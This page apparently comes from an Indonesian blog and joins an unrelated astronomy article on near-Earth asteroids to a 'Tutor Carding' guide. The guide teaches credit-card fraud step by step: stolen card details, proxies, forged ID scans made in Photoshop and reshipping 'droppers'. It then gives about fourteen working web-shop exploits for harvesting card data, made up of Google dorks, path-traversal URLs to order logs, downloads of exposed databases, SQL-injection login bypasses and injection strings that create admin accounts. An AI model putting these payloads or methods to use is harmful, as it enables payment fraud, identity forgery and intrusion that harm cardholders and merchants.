Hingga saat ini telah ribuan asteroid yang berhasil dikenali. Sebagian besar diantaranya berada di antara orbit planet Mars dan Jupiter, di daerah yang dikenal sebagai “sabuk asteroid” (asteroid belt) namun beberapa diantaranya memiliki garis edar yang menyimpang. Salah satu yang terkenal adalah Icarus, yang namanya diambil dari tokoh legenda Yunani tentang manusia bersayap yang terbang terlampau dekat dengan Matahari. Pada perihelion (titik terdekat dengan matahari), asteroid ini berada pada jarak yang lebih dekat dengan matahari daripada objek manapun juga hingga dapat menjadi merah membara. Sementara itu asteroid yang dikenal dengan nama Hidalgo, garis edarnya hampir mencapai orbit Saturnus.


Ada sejumlah asteroid yang garis edarnya memotong orbit Bumi sehingga dapat dipandang sebagai sebuah ancaman bagi planet Bumi berserta penghuninya. Asteroid semacam ini biasa disebut dengan istilah “Near-Earth Asteroid” (NEA). Sebuah asteroid digolongkan sebagai NEA apabila garis edarnya dapat mencapai jarak 1.3 AU (sekitar 195 juta km) atau kurang dari matahari. Para astronom menggolongkan NEA kedalam tiga kelompok:


Amor: Asteroid yang garis edarnya melintasi orbit Mars, namun tidak memasuki orbit bumi (contoh: 433 Eros).

Apollo: Asteroid yang garis edarnya melintasi orbit Bumi dengan periode orbit lebih lama dari satu tahun (contoh: 1620 Geographos)

Aten: Asteroid yang garis edarnya melintasi orbit Bumi dengan periode orbit kurang dari satu tahun (contoh: 2340 Hathor).

Diduga sebagian besar dari NEA keluar dari sabuk asteroid akibat bertabrakan dengan asteroid lainnya atau karena pengaruh gravitasi Jupiter. Beberapa NEA juga diperkirakan merupakan sisa-sisa dari komet yang telah mati. NEA yang terbesar yang diketahui sejauh ini adalah 1036 Ganymed dengan diameter hampir 41 km. Saat ini para astronom yang tergabung dalam proyek “Near-Earth Asteroid Tracking”


(NEAT) yang berpusat di Maui, Hawaii, masih terus mendata dan mengamati NEA dengan diameter 1 km atau lebih yang berpotensi membahayakan Bumi. Sebagian asteroid yang mendapatkan perhatian khusus adalah Toutatis, Castalia, Geographos dan Vesta. pengamatan terhadap Toutatis, Geographos dan Castalia menggunakan sarana observasi radar yang berbasis di Bumi saat asteroid tersebut melintas dalam jarak dekat, sedangkan Vesta diamati menggunakan teleskop antariksa Hubble.


Adalah tabrakan dengan asteroid berdiameter sekitar 10 km yang diperkirakan telah terjadi pada jutaan tahun lalu yang disebut-sebut sebagai salah satu kemungkinan penyebab punahnya Dinosaurus. Salah satu peristiwa yang berhubungan dengan NEA yang sempat dicatat terjadi pada tahun 1989 saat sebuah asteroid berdiameter 0.4 km melintas dengan kecepatan 74.000 km/jam pada jarak 640.000 km dari Bumi. Perlintasan asteroid dengan bumi pada jarak paling dekat tercatat terjadi pada tanggal 9 Desember 1994 saat sebuah NEA melintas pada jarak hanya 103.500 km dari Bumi (sebagai perbandingan, rata-rata jarak Bumi-Bulan adalah 384.400 km). Serangkaian peristiwa tersebut menunjukkan bahwa ancaman dari luar bumi berupa objek berukuran besar yang sewaktu-waktu dapat menghantam planet Bumi dan menimbulkan sebuah bencana besar bukanlah suatu kemungkinan yang bisa dianggap enteng.


Sejak tahun 1991, beberapa wahana antariksa telah melewati daerah sabuk asteroid dan mengirimkan data-data ke Bumi. Pada bulan Oktober 1991, wahana antariksa Galileo melintasi asteroid 951 Gaspra menjadikan objek tersebut sebagai asteroid pertama yang diamati melalui gambar beresolusi tinggi yang diambil dari sebuah wahana antariksa. Pada bulan Agustus 1993, Galileo kembali melintas sabuk asteroid dan megirimkan gambar-gambar dari asteroid 243 Ida. Pengamatan terhadap asteroid ini menunjukkan bahwa Ida memiliki satelit alam yang kemudian dinamai Dactyl. Baik Gaspra maupun Ida diklasifikasikan sebagai asteroid tipe S yang tersusun atas batuan silika yang kaya akan unsur logam.


Pada tanggal 27 juni 1997, wahana antariksa NEAR (Near-Earth Asteroid Rendezvous) berpapasan dalam jarak dekat dengan asteroid 253 Mathilde. Dalam perlintasan selama 25 menit itu, NEAR mengirimkan lebih dari 500 gambar permukaan Mathilde. Ini merupakan gambar jarak dekat pertama dari asteroid tipe C yang sebagian besarnya tersusun atas unsur Karbon. Dari sana, NEAR melanjutkan misinya menuju asteroid 433 Eros yang kemudian berhasil dicapai pada bulan Februari 1999. Selama kurang lebih dua tahun, NEAR mengorbit Eros dari jarak rata-rata sekitar 24 km dari permukaannya dan melakukan berbagai penyelidikan terhadap bentuk, ukuran, medan magnet, komposisi, permukaan dan struktur internal asteroid tersebut. Misi NEAR berakhir tanggal 12 Februari 2001 ketika wahana itu melakukan misi “bunuh diri” dengan menabrakkan diri ke permukaan Eros guna mendapatkan gambar dari jarak sangat dekat terhadap permukaan asteroid tersebut. Hal ini mencatatkan Eros sebagai asteroid pertama yang didarati oleh wahana buatan manusia
Read more ...

Tutor Carding



1. Credit Card number + cvv + expired (harus valid)
2. Proxy USA klo bisa
3. Virtual Phone Number (skype)
4. Virtual Address (klo di butuhkan)
5. Email khusus carding (yahoomail,gmail,hotmail,etc)
6. Seller
7. Dropper (biar barang lo cepet nyampe’a)
8. Roko Mild satu bungkus
9. Snack Potato Rasa Barbeque 5 Bungkus
10. Music Player (winamp,jet audio,amarok)

okay !! gw yakin lo pada nanya gimana cara dapetin proxy? nah di sini balik lagi dey lo sama yg nama’a webshell yg lo dapetin dari web yg mempunyai bug Remote File Inclusion, di sana lo bisa bikin proxy sendiri, tapi klo lo emang orang’a “MALES” mendingan lo balik lagi ke paman google, lo bisa cari situs² penyedia proxy gratis, tapi yaa gitu dey, ga awet, paling lama juga 1 jam udah mati.

Kedua tentang virtual phone number, tau skype kan ? itu loch yg buat voip (voice over internet protocol) nah lo bisa beli nomer telephone virtual dari USA melewati skype, trus fungsi’a buat apa ?? gw males jelasin’a mendingan lo join aja di chan #yogyacarderlink dan tanya² sama anak² yg ada di sana okay !!

Ketiga tentang virtual address, di sini lo beli alamat virtual di USA dan ada lembaga di sana yg ngurus barang² lo buat di kirim ke alamat asli lo, cuma proses pembelian’a agak susah, lo harus nunjukin credit card, license drive, ID card, visa, paspor, bingung gimana cara’a ? buat apa ada photoshop klo ga di gunain, hahahah, lagian dia kan cuma minta gambar hasil scan, jadi cari aja gambar²a di google trus edit dey di photoshop.

Keempat Email khusus, satu hal penting, jangan pernah ngirim orderan ke email lo yg biasa lo pake buat ngirim² pesan penting, jangan pernah lo campur aduk tu email, klo bisa lo bikin lagi email baru yg khusus buat carding, dan biasain pake logika lo, klo mo carding, nama email’a yg berhubungan dengan nama² orang USA sana, minimal lo dapet 1 point kecil penting lah untuk nama email ini.

Kelima lo harus punya seller or penjual yg kira² bisa shipping worldwide, silakan cari sendiri shop online di google yg bisa shipping worldwide dengan imajinasi kata² lo sendiri.

Keenam about Dropper, nah ini di butuhin klo emang kita dapet shop online yg ga nerima shipping worldwide, inti’a lo harus punya kenalan or koneksi di USA atau di Canada bahkan mungkin England yg bisa di ajak kerjasama, jadi begitu barang di kirim ke dropper, dia langsung ngirim ke alamat kita, jadi seandai’a lo beli laptop, jangan beli satu, tapi minimal dua, biar satu buat kita, satu buat dia, itu nama’a kerjasama kan ?? dan di situlah kerjaan dropper, mereka cuma ngedrop barang kita doank dan mereka dapet untung juga dari kita

and The Last, how to find valid credit card, here’s old bug but works

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :D CShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format

http://www.xxxxx.com/cart32/

Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :

http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template…

13. contoh bugs pada bentuk toko sistem :P roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :D igishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”
Read more ...
Designed By Blogger Templates